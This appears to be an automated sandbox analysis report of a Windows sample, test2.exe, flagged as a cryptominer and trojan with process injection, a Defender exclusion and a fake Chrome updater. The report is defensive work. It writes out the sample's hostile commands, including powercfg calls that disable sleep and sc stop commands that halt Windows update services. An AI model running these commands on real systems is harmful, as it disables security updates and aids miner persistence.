      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation

      Lowering of HIPS / PFW / Operating System Security Settings

      barindex
      Modifies power options to not sleep / hibernate
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
      Stops critical windows services
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
      Windows Management Instrumentation      		21
      Windows Service      		21
      Windows Service      		4
      Rootkit      		1
      Credential API Hooking      		111
      Security Software Discovery      		Remote Services1
      Credential API Hooking      		1
      Non-Application Layer Protocol      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Command and Scripting Interpreter      		11
      DLL Side-Loading      		712
      Process Injection      		12
      Masquerading      		LSASS Memory2
      Process Discovery      		Remote Desktop ProtocolData from Removable Media1
      Application Layer Protocol      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Service Execution      		Logon Script (Windows)1
      Abuse Elevation Control Mechanism      		2
      Disable or Modify Tools      		Security Account Manager31
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal Accounts1
      PowerShell      		Login Hook11
      DLL Side-Loading      		1
      Modify Registry      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script31
      Virtualization/Sandbox Evasion      		LSA Secrets12
      System Information Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts712
      Process Injection      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      Hidden Files and Directories      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      Abuse Elevation Control Mechanism      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
      Install Root Certificate      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
      DLL Side-Loading      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
      File Deletion      		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1491606 Sample: test2.exe Startdate: 12/08/2024 Architecture: WINDOWS Score: 100 59 xmr.test.lol 2->59 61 Multi AV Scanner detection for domain / URL 2->61 63 Malicious sample detected (through community Yara rule) 2->63 65 Antivirus detection for dropped file 2->65 67 17 other signatures 2->67 9 test2.exe 2 2->9         started        13 updater.exe 2->13         started        15 cmd.exe 1 2->15         started        17 6 other processes 2->17 signatures3 process4 file5 51 C:\Users\user\AppData\...\kkldhmzqxige.tmp, PE32+ 9->51 dropped 53 C:\Program Filesbehaviorgraphoogle\Chrome\updater.exe, PE32+ 9->53 dropped 87 Suspicious powershell command line found 9->87 89 Writes to foreign memory regions 9->89 91 Modifies the context of a thread in another process (thread injection) 9->91 109 2 other signatures 9->109 19 dialer.exe 1 9->19         started        55 C:\Windows\Temp\kkldhmzqxige.tmp, PE32+ 13->55 dropped 57 C:\Program Filesbehaviorgraphoogle\Libs\WR64.sys, PE32+ 13->57 dropped 93 Protects its processes via BreakOnTermination flag 13->93 95 Adds a directory exclusion to Windows Defender 13->95 97 Maps a DLL or memory area into another process 13->97 99 Sample is not signed and drops a device driver 13->99 22 dialer.exe 13->22         started        101 Uses powercfg.exe to modify the power settings 15->101 103 Stops critical windows services 15->103 105 Modifies power options to not sleep / hibernate 15->105 24 conhost.exe 15->24         started        26 sc.exe 1 15->26         started        34 4 other processes 15->34 107 Loading BitLocker PowerShell Module 17->107 28 conhost.exe 17->28         started        30 conhost.exe 17->30         started        32 conhost.exe 17->32         started        36 14 other processes 17->36 signatures6 process7 signatures8 69 Suspicious powershell command line found 19->69 71 Writes to foreign memory regions 19->71 73 Allocates memory in foreign processes 19->73 38 lsass.exe 19->38 injected 41 winlogon.exe 19->41 injected 43 svchost.exe 19->43 injected 47 14 other processes 19->47 75 Injects code into the Windows Explorer (explorer.exe) 22->75 77 Creates a thread in another existing process (thread injection) 22->77 79 Injects a PE file into a foreign processes 22->79 45 powershell.exe 22->45         started        process9 signatures10 81 Installs new ROOT certificates 38->81 83 Writes to foreign memory regions 38->83 85 Loading BitLocker PowerShell Module 45->85 49 conhost.exe 45->49         started        process11

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      test2.exe100%AviraHEUR/AGEN.1329646
      test2.exe55%VirustotalBrowse
      test2.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\kkldhmzqxige.tmp100%AviraHEUR/AGEN.1362795
      C:\Program Files\Google\Chrome\updater.exe100%AviraHEUR/AGEN.1329646
      C:\Users\user\AppData\Local\Temp\kkldhmzqxige.tmp100%Joe Sandbox ML
      C:\Windows\Temp\kkldhmzqxige.tmp100%Joe Sandbox ML
      C:\Program Files\Google\Chrome\updater.exe100%Joe Sandbox ML
      C:\Program Files\Google\Chrome\updater.exe55%VirustotalBrowse
      C:\Program Files\Google\Libs\WR64.sys5%ReversingLabs
      C:\Program Files\Google\Libs\WR64.sys4%VirustotalBrowse
      C:\Users\user\AppData\Local\Temp\kkldhmzqxige.tmp87%ReversingLabsWin64.Trojan.Heracles
      C:\Users\user\AppData\Local\Temp\kkldhmzqxige.tmp82%VirustotalBrowse
      C:\Windows\Temp\kkldhmzqxige.tmp75%ReversingLabsWin64.Trojan.DumpDacicBitCoinMiner
      C:\Windows\Temp\kkldhmzqxige.tmp76%VirustotalBrowse

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://schemas.xmlsoap.org/ws/2004/09/policy0%Avira URL Cloudsafe
      http://pesterbdd.com/images/Pester.png0%Avira URL Cloudsafe
      http://docs.oasis-open.org/ws-sx/ws-securitypolicy/2007020%Avira URL Cloudsafe
      http://nuget.org/NuGet.exe0%Avira URL Cloudsafe
      http://schemas.xmlsoap.org/wsdl/erties0%Avira URL Cloudsafe
      http://schemas.xmlsoap.org/soap/encoding/0%Avira URL Cloudsafe
      http://nuget.org/NuGet.exe0%VirustotalBrowse
      http://docs.oasis-open.org/ws-sx/ws-securitypolicy/2007020%VirustotalBrowse
      http://schemas.xmlsoap.org/wsdl/erties0%VirustotalBrowse
      http://schemas.xmlsoap.org/ws/2004/09/policy0%VirustotalBrowse
      http://pesterbdd.com/images/Pester.png11%VirustotalBrowse
      http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
      https://contoso.com/License0%Avira URL Cloudsafe
      https://contoso.com/Icon0%Avira URL Cloudsafe
      http://ocert.com0%Avira URL Cloudsafe
      http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
      https://github.com/Pester/Pester0%Avira URL Cloudsafe
      http://schemas.xmlsoap.org/ws/2005/07/securitypolicy0%Avira URL Cloudsafe
      https://contoso.com/Icon0%VirustotalBrowse
      http://www.apache.org/licenses/LICENSE-2.0.htmlXz0%Avira URL Cloudsafe
      https://contoso.com/License0%VirustotalBrowse
      http://schemas.xmlsoap.org/soap/encoding/0%VirustotalBrowse
      http://ocert.com0%VirustotalBrowse
      http://schemas.xmlsoap.org/ws/2005/02/trustock0%Avira URL Cloudsafe
      http://schemas.xmlsoap.org/wsdl/soap12/0%Avira URL Cloudsafe
      http://schemas.xmlsoap.org/ws/2005/07/securitypolicy0%VirustotalBrowse
      http://crl.microsof0%Avira URL Cloudsafe
      http://schemas.xmlsoap.org/wsdl/am0%Avira URL Cloudsafe
      http://schemas.xmlsoap.org/wsdl/0%Avira URL Cloudsafe
      https://contoso.com/0%Avira URL Cloudsafe
      http://schemas.xmlsoap.org/wsdl/soap12/0%VirustotalBrowse
      http://www.apache.org/licenses/LICENSE-2.0.htmlXz0%VirustotalBrowse
      https://github.com/Pester/Pester1%VirustotalBrowse
      https://nuget.org/nuget.exe0%Avira URL Cloudsafe
      http://www.quovadis.bm00%Avira URL Cloudsafe
      http://schemas.xmlsoap.org/wsdl/0%VirustotalBrowse
      https://github.com/Pester/PesterXz0%Avira URL Cloudsafe
      http://schemas.xmlsoap.org/wsdl/am0%VirustotalBrowse
      https://aka.ms/pscore680%Avira URL Cloudsafe
      http://docs.oasis-open.org/ws-sx/ws-trust/2005120%Avira URL Cloudsafe
      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0%Avira URL Cloudsafe
      https://nuget.org/nuget.exe0%VirustotalBrowse
      https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%Avira URL Cloudsafe
      https://contoso.com/0%VirustotalBrowse
      http://schemas.microsof0%Avira URL Cloudsafe
      https://github.com/Pester/PesterXz0%VirustotalBrowse
      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0%VirustotalBrowse
      https://aka.ms/pscore680%VirustotalBrowse
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%VirustotalBrowse
      http://pesterbdd.com/images/Pester.pngXz0%Avira URL Cloudsafe
      http://docs.oasis-open.org/ws-sx/ws-trust/2005120%VirustotalBrowse
      http://pesterbdd.com/images/Pester.pngXz8%VirustotalBrowse

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      xmr.test.lol
      		unknown
      		unknowntrue
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://nuget.org/NuGet.exepowershell.exe, 00000010.00000002.4467439830.00000279202E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4452257806.0000027911774000.00000004.00000800.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 00000016.00000000.4433015927.00000207A962F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmpfalse
        • 11%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 00000016.00000000.4433015927.00000207A962F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        https://contoso.com/Licensepowershell.exe, 00000010.00000002.4452257806.0000027911774000.00000004.00000800.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        https://contoso.com/Iconpowershell.exe, 00000010.00000002.4452257806.0000027911774000.00000004.00000800.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        http://ocert.comlsass.exe, 00000016.00000002.5692038609.00000207AA000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000000.4434969807.00000207AA000000.00000004.00000001.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        https://github.com/Pester/Pesterpowershell.exe, 00000010.00000002.4452257806.000002791049B000.00000004.00000800.00020000.00000000.sdmpfalse
        • 1%, Virustotal, Browse
        • Avira URL Cloud: safe
        		unknown
        http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 00000016.00000000.4433015927.00000207A962F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000016.00000002.5667650676.00000207A962F000.00000004.00000001.00020000.00000000.sdmpfalse
        • 0%, Virustotal, Browse
